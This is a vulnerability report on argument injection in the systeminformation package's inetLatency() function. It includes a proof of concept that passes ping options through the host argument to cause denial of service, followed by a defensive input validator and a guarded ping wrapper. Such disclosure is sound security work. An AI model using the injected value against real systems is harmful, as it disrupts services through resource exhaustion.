Denial of Service in sebhildebrandt/systeminformation


Reported on

Feb 11th 2021


systeminformation is vulnerable to Denial of Service.

It is possible to override the ping command's parameters through the host argument of inetLatency(), which makes the command run for an excessively long time.

Proof of Concept

Create a .js file with the content below and run it.

const si = require('systeminformation');
si.inetLatency("-c 10000000000 -w 999999999").then((a) => { console.log(a) })
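
A caller-side guard for the issue above, as an added example (not code from the original report or from the systeminformation project): it accepts only a single IP literal or hostname, so a string like the one in the PoC is rejected before it can reach ping as options. The function names, the fixed -c/-w values and the 10-second timeout are assumptions; the flags follow Linux iputils ping, as in the PoC.

```javascript
const net = require('net');
const { execFile } = require('child_process');

// RFC 1123 style hostname: dot-separated labels of letters, digits and
// hyphens, no label starting or ending with a hyphen, at most 253 chars.
const LABEL = '[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?';
const HOSTNAME_RE = new RegExp('^(?=.{1,253}$)' + LABEL + '(\\.' + LABEL + ')*$', 'i');

// True only for one IP literal or one hostname. Whitespace and a leading "-"
// never match, so the value cannot be parsed by ping as extra options.
function isSafePingTarget(host) {
  if (typeof host !== 'string') return false;
  return net.isIP(host) !== 0 || HOSTNAME_RE.test(host);
}

// Count and deadline are fixed by the application (assumed values), and "--"
// ends option parsing so the host is always treated as the destination.
function buildPingArgs(host) {
  if (!isSafePingTarget(host)) {
    throw new TypeError('rejected ping target: ' + JSON.stringify(host));
  }
  return ['-c', '4', '-w', '5', '--', host];
}

// Runs ping without a shell, as an argument array, with a hard timeout so a
// stuck process is killed even if the deadline option is not honoured.
function pingOnce(host, callback) {
  return execFile('ping', buildPingArgs(host), { timeout: 10000 }, callback);
}

// Wraps any latency function (for example si.inetLatency) so that it is only
// ever called with a validated target.
function guardLatency(latencyFn) {
  return (host) => {
    if (!isSafePingTarget(host)) {
      return Promise.reject(new TypeError('rejected ping target'));
    }
    return latencyFn(host);
  };
}
```

With the library installed, `guardLatency(si.inetLatency)('example.com')` resolves as usual, while the PoC string is rejected without spawning a process.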